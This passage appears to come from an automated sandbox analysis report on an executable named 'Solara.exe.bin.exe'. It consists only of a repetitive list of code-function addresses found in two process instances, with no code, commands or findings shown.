                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009322100_2_00932210
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F32000_2_008F3200
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009482300_2_00948230
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009102400_2_00910240
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008DD2500_2_008DD250
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0092D3B00_2_0092D3B0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008EE3A00_2_008EE3A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009053A00_2_009053A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009193D00_2_009193D0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009393E00_2_009393E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008FA3F00_2_008FA3F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008DA3000_2_008DA300
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D83100_2_008D8310
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008EB3100_2_008EB310
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009333300_2_00933330
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F73200_2_008F7320
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009113200_2_00911320
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008FD3300_2_008FD330
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0091A3500_2_0091A350
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009203500_2_00920350
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0092C3500_2_0092C350
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F93600_2_008F9360
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008FE4900_2_008FE490
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009284C00_2_009284C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0093A4C00_2_0093A4C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009064100_2_00906410
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008ED4100_2_008ED410
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009234300_2_00923430
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009384200_2_00938420
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E04300_2_008E0430
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E44300_2_008E4430
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E24500_2_008E2450
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F54500_2_008F5450
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009555920_2_00955592
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0090C5A00_2_0090C5A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0090F5D00_2_0090F5D0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009395D00_2_009395D0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F55C00_2_008F55C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E35100_2_008E3510
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0092F5300_2_0092F530
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E65300_2_008E6530
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F35300_2_008F3530
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009295760_2_00929576
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0090B5600_2_0090B560
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009256900_2_00925690
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008DE6900_2_008DE690
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E76C00_2_008E76C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008FC6D00_2_008FC6D0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009086E00_2_009086E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0090D6E00_2_0090D6E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008DB6F00_2_008DB6F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F66F00_2_008F66F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008DC6100_2_008DC610
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009276300_2_00927630
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009316300_2_00931630
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E06200_2_008E0620
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009196500_2_00919650
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009346400_2_00934640
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009116600_2_00911660
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0092A6600_2_0092A660
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009207F00_2_009207F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008DD7F00_2_008DD7F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009537180_2_00953718
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008DA7000_2_008DA700
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009257000_2_00925700
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D97180_2_008D9718
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E97400_2_008E9740
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F98A00_2_008F98A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009178A00_2_009178A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F28C00_2_008F28C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0090A8100_2_0090A810
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009328000_2_00932800
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008ED8100_2_008ED810
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E38400_2_008E3840
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D58560_2_008D5856
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0090C8700_2_0090C870
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008EF8600_2_008EF860
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0092D9800_2_0092D980
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D89900_2_008D8990
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E89A00_2_008E89A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0090E9C00_2_0090E9C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008DC9060_2_008DC906
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008EE9000_2_008EE900
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009089000_2_00908900
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0093D90A0_2_0093D90A
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009269200_2_00926920
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E69400_2_008E6940
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008DB9600_2_008DB960
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F3A900_2_008F3A90
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00937AB00_2_00937AB0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E7AA00_2_008E7AA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00908AA00_2_00908AA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D9AF60_2_008D9AF6
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00921A000_2_00921A00
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00933A200_2_00933A20
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008FCA300_2_008FCA30
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008FDA300_2_008FDA30
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00903A500_2_00903A50
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0092BA400_2_0092BA40
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00918A700_2_00918A70
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008EDB800_2_008EDB80
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E0B900_2_008E0B90
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00927BB00_2_00927BB0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E1BA00_2_008E1BA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0090ABF00_2_0090ABF0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008FABF00_2_008FABF0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008DCB0F0_2_008DCB0F
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D7B000_2_008D7B00
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0091EB400_2_0091EB40
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E7B500_2_008E7B50
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F2C000_2_008F2C00
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00931C000_2_00931C00
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E4C100_2_008E4C10
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00903C700_2_00903C70
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008EEC700_2_008EEC70
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F2D800_2_008F2D80
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0090DD800_2_0090DD80
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00907DD00_2_00907DD0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0090DDD90_2_0090DDD9
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D8DD00_2_008D8DD0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00917DF00_2_00917DF0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E0DE00_2_008E0DE0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D5DF60_2_008D5DF6
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F9D000_2_008F9D00
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0092FD000_2_0092FD00
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0090FD200_2_0090FD20
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D9D300_2_008D9D30
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00933D600_2_00933D60
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00912E800_2_00912E80
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0092AE800_2_0092AE80
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00913EA00_2_00913EA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F5EB00_2_008F5EB0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0090AEC00_2_0090AEC0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0091AEE00_2_0091AEE0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00937E100_2_00937E10
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F0E100_2_008F0E10
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008FFE200_2_008FFE20
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008DDE600_2_008DDE60
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00916F900_2_00916F90
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0092FF900_2_0092FF90
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F6FC00_2_008F6FC0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00922FC00_2_00922FC0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0092EF100_2_0092EF10
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008DBF100_2_008DBF10
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F2F100_2_008F2F10
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E3F200_2_008E3F20
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004428002_2_00442800
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0042C0102_2_0042C010
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004118392_2_00411839
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0044816C2_2_0044816C
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004109932_2_00410993
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0040BA202_2_0040BA20
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0041BAC12_2_0041BAC1
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00417B202_2_00417B20
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004464002_2_00446400
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0044BCE02_2_0044BCE0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00412CAF2_2_00412CAF
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0040E5602_2_0040E560
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004125752_2_00412575
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0044C5B02_2_0044C5B0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00427E502_2_00427E50
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00437E652_2_00437E65
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00420EA02_2_00420EA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0042F7602_2_0042F760
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0044AF802_2_0044AF80
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004010402_2_00401040
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0044B8402_2_0044B840
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004318502_2_00431850
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004138702_2_00413870
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004440702_2_00444070
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004240302_2_00424030
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004328D12_2_004328D1
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004368D62_2_004368D6
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004368812_2_00436881
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0041F8882_2_0041F888
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004288A02_2_004288A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004271602_2_00427160
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004469602_2_00446960
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0040F1672_2_0040F167
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004439102_2_00443910
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004259202_2_00425920
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0041312E2_2_0041312E
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004381D02_2_004381D0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0040A1E02_2_0040A1E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004249E02_2_004249E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004311972_2_00431197
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0042E9A02_2_0042E9A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00408A102_2_00408A10
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0042CA202_2_0042CA20
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0044A2202_2_0044A220
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00430A2A2_2_00430A2A
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0043E2302_2_0043E230
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0043AAC12_2_0043AAC1
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00402AD02_2_00402AD0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0043BAD02_2_0043BAD0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0044A3502_2_0044A350
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0040DB0D2_2_0040DB0D
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00439B192_2_00439B19
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00441B302_2_00441B30
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004243C02_2_004243C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0044AC602_2_0044AC60
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0044B4702_2_0044B470
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004094002_2_00409400
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00424CC02_2_00424CC0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0040CCD02_2_0040CCD0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0041ACD02_2_0041ACD0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0042CCD02_2_0042CCD0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0040C4E02_2_0040C4E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0044A4E02_2_0044A4E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004034F02_2_004034F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0043DC802_2_0043DC80
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0042C4862_2_0042C486
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0041FC882_2_0041FC88
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0040FCB02_2_0040FCB0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0041D4B82_2_0041D4B8
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00416D432_2_00416D43
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004445422_2_00444542
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0044A5702_2_0044A570
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00407D302_2_00407D30
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00446D302_2_00446D30
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0042FDCC2_2_0042FDCC
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004205802_2_00420580
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004305852_2_00430585
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0042ED902_2_0042ED90
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00441D902_2_00441D90
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0043E5B02_2_0043E5B0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004176712_2_00417671
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004356742_2_00435674
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0044A6102_2_0044A610
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0041CED32_2_0041CED3
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00408E802_2_00408E80
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00403E902_2_00403E90
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0042CE912_2_0042CE91
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00432E9E2_2_00432E9E
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004436AA2_2_004436AA
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00428EB02_2_00428EB0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0043DF502_2_0043DF50
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004047722_2_00404772
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004317752_2_00431775
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0043B7102_2_0043B710
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00431FCA2_2_00431FCA
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_004367DA2_2_004367DA
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00435F882_2_00435F88
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0041DF8F2_2_0041DF8F
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0041EF9E2_2_0041EF9E
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0041E7AF2_2_0041E7AF
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0043F7B02_2_0043F7B0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009160902_2_00916090
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008DC8902_2_008DC890
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009298B02_2_009298B0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F98A02_2_008F98A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009178A02_2_009178A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F28C02_2_008F28C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009290F02_2_009290F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0093B0F02_2_0093B0F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E50E02_2_008E50E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F00E02_2_008F00E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008EA0F02_2_008EA0F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009260102_2_00926010
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008D10002_2_008D1000
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009328002_2_00932800
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008ED8102_2_008ED810
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008FE0202_2_008FE020
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008DE0302_2_008DE030
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E38402_2_008E3840
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0090C8702_2_0090C870
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0090D0702_2_0090D070
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008EF8602_2_008EF860
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008D89902_2_008D8990
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008EF1902_2_008EF190
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E01A02_2_008E01A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E89A02_2_008E89A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009341D02_2_009341D0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0090E9C02_2_0090E9C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008D41D02_2_008D41D0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008DD1E02_2_008DD1E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009001102_2_00900110
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009241102_2_00924110
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008EE9002_2_008EE900
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0093D90A2_2_0093D90A
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009081302_2_00908130
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009269202_2_00926920
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E69402_2_008E6940
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E91502_2_008E9150
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009071702_2_00907170
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008DB9602_2_008DB960
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F3A902_2_008F3A90
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F52902_2_008F5290
